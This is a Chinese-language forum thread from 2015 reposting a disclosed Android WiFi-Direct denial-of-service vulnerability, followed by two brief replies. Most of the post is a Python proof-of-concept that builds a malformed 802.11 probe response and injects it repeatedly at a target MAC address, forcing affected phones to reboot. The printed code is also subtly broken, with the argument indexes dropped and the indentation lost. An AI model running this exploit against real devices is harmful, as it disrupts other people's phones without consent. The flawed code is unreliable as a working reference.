90_ 发表于 2015-1-30 10:56:35

安卓Wifi直连拒绝服务漏洞

- Android WiFi-Direct Denial of Service
http://seclists.org/fulldisclosure/2015/Jan/104

部分安卓设备在搜索Wifi直连设备时可遭受拒绝服务攻击

攻击者可以发送一个精心构造的802.11响应信号帧 使Dalvik子系统由于WiFiMonitor类中未捕获的异常而重启

受影响设备版本:
   . Nexus 5 - Android 4.4.4
   . Nexus 4 - Android 4.4.4
   . LG D806 - Android 4.2.2
   . Samsung SM-T310 - Android 4.2.2
   . Motorola RAZR HD - Android 4.1.2

在4.4.4系统上复现成功

由于安卓官方回应“该漏洞影响较小,没有时间修复”,目前该漏洞没有任何补丁

POC:
#!/usr/bin/env python

import sys
import time
import struct
import PyLorcon2


def get_probe_response(source, destination, channel):
frame = str()
frame += "\x50\x00"# Frame Control
frame += "\x00\x00"# Duration
frame += destination
frame += source
frame += source
frame += "\x00\x00"# Sequence Control
frame += "\x00\x00\x00\x00\x00\x00\x00\x00"# Timestamp
frame += "\x64\x00"# Beacon Interval
frame += "\x30\x04"# Capabilities Information

# SSID IE
frame += "\x00"
frame += "\x07"
frame += "DIRECT-"

# Supported Rates
frame += "\x01"
frame += "\x08"
frame += "\x8C\x12\x98\x24\xB0\x48\x60\x6C"

# DS Parameter Set
frame += "\x03"
frame += "\x01"
frame += struct.pack("B", channel)

# P2P
frame += "\xDD"
frame += "\x27"
frame += "\x50\x6F\x9A"
frame += "\x09"
# P2P Capabilities
frame += "\x02" # ID
frame += "\x02\x00" # Length
frame += "\x21\x00"
# P2P Device Info
frame += "\x0D" # ID
frame += "\x1B\x00" # Length
frame += source
frame += "\x01\x88"
frame += "\x00\x0A\x00\x50\xF2\x04\x00\x05"
frame += "\x00"
frame += "\x10\x11"
frame += "\x00\x06"
frame += "fafa\xFA\xFA"

return frame


def str_to_mac(address):
return "".join(map(lambda i: chr(int(i, 16)), address.split(":")))


if __name__ == "__main__":
if len(sys.argv) != 3:
    print "Usage:"
    print "poc.py <iface> <target>"
    print "Example:"
    print "poc.py wlan0 00:11:22:33:44:55"
    sys.exit(-1)

iface = sys.argv
destination = str_to_mac(sys.argv)

context = PyLorcon2.Context(iface)
context.open_injmon()

channel = 1
source = str_to_mac("00:11:22:33:44:55")
frame = get_probe_response(source, destination, channel)

print "Injecting PoC."
for i in range(100):
    context.send_bytes(frame)
    time.sleep(0.100)
运行poc,在 设置-wlan-右下按钮wlan直连-搜索设备时触发漏洞,系统重启

Jinice 发表于 2015-1-30 20:29:54

远程让手机重启不算漏洞

ran 发表于 2015-1-30 22:13:37

又来分享好东西了
页: [1]
查看完整版本: 安卓Wifi直连拒绝服务漏洞